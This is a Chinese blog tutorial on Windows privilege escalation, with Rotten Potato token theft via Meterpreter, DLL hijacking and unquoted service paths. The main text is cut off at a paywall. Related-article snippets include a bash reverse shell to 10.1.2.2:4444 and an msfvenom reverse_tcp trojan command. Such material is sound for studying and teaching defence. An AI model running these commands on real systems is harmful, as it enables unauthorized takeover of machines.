权限提升-烂土豆&dll劫持&引号路径&服务权限

最新推荐文章于 2025-10-25 12:25:51 发布
原创 最新推荐文章于 2025-10-25 12:25:51 发布 · 233 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web #网络安全 #渗透测试

本文介绍了Windows系统中权限提升的几种技术,包括烂土豆提权、DLL劫持以及不带引号路径的安全隐患。通过令牌窃取配合烂土豆可以实现权限提升,DLL劫持则利用程序加载DLL的顺序,将恶意DLL置于搜索路径中,以控制系统DLL的加载。同时,文章还展示了如何利用不带引号的服务路径创建木马程序,以达到控制目的。

权限提升-烂土豆&dll劫持&引号路径&服务权限

单纯令牌窃取:web权限或本地提权
令牌窃取失败后可以配合烂土豆来提权
在msf上:
upload /root/potato.exe C:\Users\Public
cd C:\Users\Public
use incognito
list_tokens -u
execute -cH -f ./potato.exe
list_tokens -u
impersonate_token “NT AUTHORITY\SYSTEM”
dll劫持配合令牌窃取
Windows程序启动的时候需要DLL。如果这些DLL 不存在,则可以通过在应用程序要查找的位置放置恶意DLL来提权。通常,Windows应用程序有其预定义好的搜索DLL的路径,它会根据下面的顺序进行搜索:
Windows查找DLL目录及其顺序如下:
1、应用程序加载的目录
2、C:\Windows\System32
3、C:\Windows\System
4、C:\Windows
5、当前工作目录Current Working Directory,CWD
6、在PATH环境变量的目录(先系统后用户)
这样的加载顺序很容易导致一个系统dll被劫持,因为只要攻击者将目标文件和恶意dll放在一起即可,导致恶意dll先于系统dll加载,而系统dll是非常常见的,所以当时基于这样的加载顺序,出现了大量受影响软件。
0x002 演示
程序运行一般会加载系统dll或本身程序自带的dll,如果我们将程序执行时需要加载的dll文件替换成木马程序,那么我们下次在启动程序时所加载的dll就是我们替换的那个木马程序了。
攻击过程:收集进程加载的dll-制作dll木马并上传-替换dll-启动应用后成功
我们在Windows2008装了一个第三方软件用于测试(flashftp)
1、收集进程加载的dll
使用火绒剑分析该进程执行时加载了哪些dll
系统文件一般我们是更改不了的,所以一般选择未知文件和数字签名文件

最低0.47元/天 解锁文章
权限提升】62 土豆 dll劫持 引号路径 服务权限
(∪.∪ )...zzz的博客
08-07 283
目录令牌窃取配合土豆提权win2012-土豆配合令牌窃取提权-web权限win2012-DLL劫持提权应用-配合MSF-web权限win2012 -不带引号服务路径配合MSF-web 本地权限Win2012-不安全的服务权限配合MSF-本地权限检测服务权限配置制作文件并上传更改服务路径指向调用后成功 涉及资源: https://github.com/tennc/webshell https://www.sdbeta.com/wg/2020/0628/235361.html https://docs.mi
web权限提升-令牌窃取&土豆&dll劫持
m0_61506558的博客
10-20 590
通过中间人攻击,将COM(NT\SYSTEM权限)在第二步挑战应答过程中认证的区块改成自己的区块获取SYSTEM令牌,然后利用msf的模仿令牌功能模仿SYSTEM令牌。dll劫持提权需要特定软件应用的控制权限及启用配合,复杂鸡肋AlwaysInstallElevated提权默认禁用配置,利用成功机会很少(四)不带引号服务路径配合MSF-web当Windows服务运行,会发生以下两种情况之一。如果给出了可执行文件,并且引用了完整路径,则系统会按字面解释它并执行(如图1)。
第62天-权限提升-土豆&dll 劫持&引号路径&服务
MCTSOG的博客
05-07 1672
思维导图 演示案例: 案例一 Win2012-土豆配合令牌窃取提权-Web 权限 单纯令牌窃取:适用于web权限本地提权 如配合土豆提权:适用于web数据库等权限 提权原理 RottenPotato RottenPotato(土豆)提权的原理可以简述如下: 1.欺骗 “NT AUTHORITY\SYSTEM”账户通过NTLM认证到我们控制的TCP终端。 2.对这个认证过程使用中间人攻击(NTLM重放),为“NT AUTHORITY\SYSTEM”账户本地协商一个安全令牌。这个过程是通过一系列的
Sudo会话劫持权限提升
最新发布
tomato的博客
10-25 865
本文分析了Sudo在Unix/Linux系统中会话处理的安全缺陷,指出其仍存在会话劫持风险,可能导致权限提升。研究聚焦于双重特权会话、主体资格过宽及票据可重用问题,并提出了shell代理和票据重用两种攻击设计。实验表明,即使在最新版本中,结合底层shell仍可能受此类攻击影响,威胁系统安全。
权限提升土豆 || DLL 劫持.
网络安全领域___专研者.
05-01 1617
权限提升简称提权,由于操作系统都是多用户操作系统,用户之间都有权限控制,比如通过 Web 漏洞拿到的是 Web 进程的权限,往往 Web 服务都是以一个权限很低的账号启动的,因此通过 Webshell 进行一些操作会受到限制,这就需要将其提升为管理甚至是 System 权限。通常通过操作系统漏洞操作系统的错误配置进行提权,也可以通过第三方软件服务,如数据库 FTP 等软件的漏洞进行提权。
第62天:权限提升-土豆&dll劫持&引号路径&服务权限1
08-03
1、应用程序加载的目录 5、当前工作目录 Current Working Directory,CWD 6、在 PATH 环境变量的目录(先系统后用户)
劫持管理员权限 赛门铁克提醒用户警惕Android勒索软件
weixin_33978016的博客
07-03 201
如今,勒索软件已经成为当今最主要的恶意软件类型之一,尤其是随着移动设备的大范围普及,针对移动平台的勒索软件也随之大增。近期,赛门铁克安全团队发现一种面向Android设备的勒索软件变种Android.Lockdroid.E。该恶意软件利用点击劫(Clickjacking)手段,试图诱骗用户为恶意软件提供设备管理员的权限。与勒索软件相同,移动恶意软件一旦获...
通用性业务逻辑组合拳劫持你的权限
weixin_50464560的博客
10-27 381
robots   作者: 启明星辰(江苏)-Vulkey_Chen  米斯特安全攻防实验室 前言 这是一个理论上通杀很多大型企业网站的漏洞缺陷~ 可能很多朋友点击来看见标题就觉得,这家伙在吹牛逼了我倒要看看这货能怎么吹,CSRF之登陆我的账号能有啥玩意危害? 先按奈住你心中不屑的情绪,听我慢慢道来~   通用业务功能分析 最近很喜欢挖一些通用漏洞(不是程序通用,而是功能通用),会经常拿着BAT三家以及其他一些大型网站进行业务功能点的对比,来看看有哪些是共用的功能点,这边列..
渗透测试-权限提升
weixin_46626737的博客
03-13 676
比如:C://program files/a.exe -f,windows识别到空格,认为后面是参数,正确的应该是”C://program files/a.exe“ -f。命令问题:利用tar压缩,文件名改为--参数类型,从而执行 ,利用定任务,和SUID(其他命令也可,换文件名-参数)先获得webshell,然后进行上传一些文件,进行测试提权(msf者手动的EXP),然后创建用户,开启端口,远程连接。假如在C://加一个program恶意文件exe后缀,再次执行,则该恶意文件会被执行。
Windows提权
小袁的博客
11-20 1661
windows提权学习过程中的一些总结
系统提权——Windows系统提权
JulySec的博客
02-13 2566
系统提权——Windows系统提权。 1、使用系统自带命令提权; 2、进程注入; 3、令牌窃取; 4、DLL劫持; 5、不安全的服务配置。 UAC机制的绕过
土豆提权(MS16-075)--令牌窃取提权
bring_coco的博客
05-28 4693
漏洞介绍 当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求,Microsoft 服务器消息块 (SMB) 中存在特权提升漏洞。成功利用此漏洞的攻击者可以使用提升的特权执行任意代码。 若要利用此漏洞,攻击者首先必须登录系统。然后,攻击者可以运行一个为利用此漏洞而经特殊设计的应用程序,从而控制受影响的系统。此更新通过更正 Windows 服务器消息块 (SMB) 服务器处理凭据转发请求的方式来修复此漏洞。 注:土豆(Rotten Potato)提权是一个本地提权,是针对本地用户的,不能用于域用户
62权限提升-土豆&dll劫持&引号路径&服务权限
san3144393495的博客
12-24 1010
提取环境分为webweb又分为asp,php之类,唯独jsp不需要提权)和本地权限划分:system > administer > users > webshell权限本地权限一般在内网中才会介绍,内网渗透的候有可能通过网站渗透,也可能是拿到一个用户权限,如果不是域管理权限,域上面单纯的一个操作ftp传输的用户,这种层面的提取称为本地提权,有些提权方法只针对部分操作系统,大部分都是win2018之前,相关文件及后门免杀问题等,避免上传上去就被杀软杀了facai。
论内网渗透中,反弹shell的各种姿势
热门推荐
土豆的博客
12-13 7万+
反弹shell是进入内网的第一步,也是权限提升用到的至关重要的一步。 1、bash反弹 攻击机: nc -lvp 4444 客户机: bash -i>& /dev/tcp/10.1.2.2/4444 0>&1 命令介绍: nc -i使用监听模式 -v 显示命令执行过程 -p 指定端口号。 -e 执行给定的命令 bash -i使用交互模式, -c 执行跟的命令 重定向 0:标准输入,
Meterpreter提权详解
子曰小玖的博客
08-08 3410
0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe 这里我们为生成的木马指定了payload为: windo...
windows提权—土豆(RottenPotato)及Juicy Potato提权
negnegil的博客
09-11 1万+
介绍 土豆(Rotten Potato) MS16-075 提权是一个本地提权,只针对本地用户,不支持域用户 适用版本:Windows 7、8、10、2008、2012 土豆下载地址: https://github.com/foxglovesec/Potato 土豆提权原理: 欺骗 “NT AUTHORITY\SYSTEM”账户通过NTLM认证到我们控制的TCP终端。 对这个认证过程使用中间人攻击(NTLM重放),为“NT AUTHORITY\SYSTEM”账户本地协商一个安全令牌。这个过程是通
权限提升策略:土豆dll劫持服务路径详解
在IT安全领域,本篇内容主要关注于Windows操作系统中的高级权限提升技术,特别是通过土豆(Potato.exe)和DLL劫持来获取更高的权限。首先,我们来探讨以下几个关键概念: 1. **权限提升土豆(Potato.exe)**...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值